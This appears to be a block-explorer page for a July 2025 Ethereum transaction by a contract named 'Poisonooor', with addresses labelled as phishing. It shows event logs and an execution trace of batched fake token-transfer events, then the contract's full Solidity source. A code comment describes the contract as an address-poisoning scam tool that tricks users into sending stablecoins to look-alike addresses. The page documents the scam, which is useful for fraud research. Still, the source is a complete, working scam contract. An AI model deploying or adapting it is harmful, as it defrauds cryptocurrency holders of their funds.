Transaction Hash:
Block:
22854029 at Jul-05-2025 03:52:11 PM +UTC
Transaction Fee:
0.000036245508754455 ETH
$0.09
Gas Used:
68,709 Gas / 0.527521995 Gwei
Emitted Events:
368 |
0x1601dc662e650d8981f333c5621e10152418689d.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x000000000000000000000000f8a11579259d3aea11e9f96216de0837303f5678, 0x000000000000000000000000d535264066e85bc311d072b8cbe862eab0022c24, 000000000000000000000000000000000000000000000000372a0970862d8000 )
|
369 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x000000000000000000000000d535264066e85bc311d072b8cbe862eab0022c24, 0x0000000000000000000000001601dc662e650d8981f333c5621e10152418689d, 000000000000000000000000000000000000000000000000372a0970862d8000 )
|
370 |
0x1601dc662e650d8981f333c5621e10152418689d.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x0000000000000000000000008c7c72653cc203f96aa2e9ad6383f5fa5840030a, 0x000000000000000000000000a476e899bb89501065748a10b034034d1b85cf1b, 000000000000000000000000000000000000000000000000016345785d8a0000 )
|
371 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x000000000000000000000000a476e899bb89501065748a10b034034d1b85cf1b, 0x0000000000000000000000001601dc662e650d8981f333c5621e10152418689d, 000000000000000000000000000000000000000000000000016345785d8a0000 )
|
372 |
0x1601dc662e650d8981f333c5621e10152418689d.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x000000000000000000000000d53547849e0e6fb46a872ad910afc16ebd5f2c24, 0x0000000000000000000000006a835c4c46b24f3b9483c469038702322f0696b6, 000000000000000000000000000000000000000000000000036c590edebee000 )
|
373 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x0000000000000000000000006a835c4c46b24f3b9483c469038702322f0696b6, 0x0000000000000000000000001601dc662e650d8981f333c5621e10152418689d, 000000000000000000000000000000000000000000000000036c590edebee000 )
|
374 |
0x1601dc662e650d8981f333c5621e10152418689d.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x00000000000000000000000096030802b33a610d6b9a54bc63084bd2a0c3087e, 0x0000000000000000000000009dc6904b2a8cdf4a8084136f2ff42eaf8da5373d, 00000000000000000000000000000000000000000000000014d0d906a2bcf5b8 )
|
375 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x0000000000000000000000009dc6904b2a8cdf4a8084136f2ff42eaf8da5373d, 0x0000000000000000000000001601dc662e650d8981f333c5621e10152418689d, 00000000000000000000000000000000000000000000000014d0d906a2bcf5b8 )
|
376 |
0x1601dc662e650d8981f333c5621e10152418689d.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x0000000000000000000000009dc65308ec7f0376ae510e5866dab3b484dc373d, 0x000000000000000000000000cd162a51d439a57cd876a5a0e35049bf63ef9cff, 00000000000000000000000000000000000000000000000006f05b59d3b20000 )
|
377 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x000000000000000000000000cd162a51d439a57cd876a5a0e35049bf63ef9cff, 0x0000000000000000000000001601dc662e650d8981f333c5621e10152418689d, 00000000000000000000000000000000000000000000000006f05b59d3b20000 )
|
378 |
0x1601dc662e650d8981f333c5621e10152418689d.0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef( 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef, 0x000000000000000000000000bd1bb2774c5eae7f8651016c2a26db7a7dd39d35, 0x0000000000000000000000002f880d03ea84d9b49ad0266dbd1de47cb20e6961, 000000000000000000000000000000000000000000000000083019dfc17b0000 )
|
379 |
Poisonooor.0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db( 0xc1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db, 0x0000000000000000000000002f880d03ea84d9b49ad0266dbd1de47cb20e6961, 0x0000000000000000000000001601dc662e650d8981f333c5621e10152418689d, 000000000000000000000000000000000000000000000000083019dfc17b0000 )
|
Account State Difference:
Address | Before | After | State Difference | ||
---|---|---|---|---|---|
0x4AAE2F23...6F8466c82 | (Fake_Phishing1250369) |
0.276266752366509587 Eth
Nonce: 34202
|
0.276230506857755132 Eth
Nonce: 34203
| 0.000036245508754455 | |
0xdadB0d80...24f783711
Miner
| (BuilderNet) | 29.342426671525872049 Eth | 29.342430106975872049 Eth | 0.00000343545 |
Execution Trace
Poisonooor.transfer( 0x0000000000000000000000000000000000000020, 32 ) => ( True )
Poisonooor.attemptTransfer( token=0x1601Dc662e650d8981F333c5621E10152418689D, from=0xF8A11579259D3Aea11E9F96216De0837303F5678, to=0xd535264066e85Bc311d072b8cBE862Eab0022C24, amount=3975000000000000000 )
-
Fake_Phishing1258380.23b872dd( )
-
Poisonooor.attemptTransfer( token=0x1601Dc662e650d8981F333c5621E10152418689D, from=0x8C7c72653cc203f96Aa2e9ad6383F5fA5840030a, to=0xa476E899bB89501065748a10b034034d1B85cF1B, amount=100000000000000000 )
-
Fake_Phishing1258380.23b872dd( )
-
Poisonooor.attemptTransfer( token=0x1601Dc662e650d8981F333c5621E10152418689D, from=0xD53547849E0e6Fb46a872ad910AfC16EbD5f2c24, to=0x6a835c4c46b24f3b9483c469038702322f0696b6, amount=246670000000000000 )
-
Fake_Phishing1258380.23b872dd( )
-
Poisonooor.attemptTransfer( token=0x1601Dc662e650d8981F333c5621E10152418689D, from=0x96030802b33A610d6B9a54bc63084bD2a0C3087E, to=0x9Dc6904B2a8CDf4A8084136f2fF42EAf8Da5373d, amount=1499937298437699000 )
-
Fake_Phishing1258380.23b872dd( )
-
Poisonooor.attemptTransfer( token=0x1601Dc662e650d8981F333c5621E10152418689D, from=0x9dC65308eC7F0376aE510e5866DAb3b484dC373d, to=0xCd162A51d439a57CD876A5A0e35049bF63ef9CFF, amount=500000000000000000 )
-
Fake_Phishing1258380.23b872dd( )
-
Poisonooor.attemptTransfer( token=0x1601Dc662e650d8981F333c5621E10152418689D, from=0xBD1bb2774C5EAE7F8651016c2a26Db7A7Dd39D35, to=0x2f880d03EA84D9B49Ad0266dbd1DE47Cb20E6961, amount=590000000000000000 )
-
Fake_Phishing1258380.23b872dd( )
-
pragma solidity 0.8.26; interface IERC20 { function transfer(address to, uint256 value) external returns (bool); function transferFrom(address from, address to, uint256 value) external returns (bool); function balanceOf(address account) external view returns (uint256); } contract Poisonooor { /* This contract is used by bad guys for the address poisoning scam to trick inattentive users into sending USDT/USDC to the wrong addresses Recreated and exposed by Wintermute DESCRIPTION OF HOW THIS SCAM WORKS: https://www.blockaid.io/blog/a-deep-dive-into-address-poisoning */ using SafeERC20 for IERC20; mapping(address => mapping(address => uint256)) public mapping_4850931766; event Transferred(bytes32 indexed, address indexed, address indexed, uint256) anonymous; receive() external payable {} fallback() external payable { require(msg.value == 0, "Ether not accepted"); transfer(address(0), 0); } function attemptTransfer(IERC20 token, address from, address to, uint256 amount) external { token.safeTransferFrom(from, to, amount); } function transfer(address, uint256) public returns (bool) { uint256 len = msg.data.length; require((len - 68) % 128 == 0, "Invalid call data length"); uint256 iters = (len - 68) / 128; for (uint256 i = 0; i < iters; i++) { uint256 offset = 68 + i * 128; address from; address to; address token; uint256 amount; assembly { from := calldataload(offset) to := calldataload(add(offset, 32)) token := calldataload(add(offset, 64)) amount := calldataload(add(offset, 96)) } try this.attemptTransfer(IERC20(from), to, token, amount) { emit Transferred(hex"c1acce7eb1b6d4d93ed97c1fa3bb654388388a4b4f58e6eafe51d6e480f2a3db", token, from, amount); } catch { mapping_4850931766[token][from] += amount; } } return true; } } library SafeERC20 { error SafeERC20FailedOperation(address token); function safeTransferFrom(IERC20 token, address from, address to, uint256 value) internal { _callOptionalReturn(token, abi.encodeCall(token.transferFrom, (from, to, value))); } function _callOptionalReturn(IERC20 token, bytes memory data) private { uint256 returnSize; uint256 returnValue; assembly ("memory-safe") { let success := call(gas(), token, 0, add(data, 0x20), mload(data), 0, 0x20) if iszero(success) { let ptr := mload(0x40) returndatacopy(ptr, 0, returndatasize()) revert(ptr, returndatasize()) } returnSize := returndatasize() returnValue := mload(0) } if (returnSize == 0 ? address(token).code.length == 0 : returnValue != 1) { revert SafeERC20FailedOperation(address(token)); } } }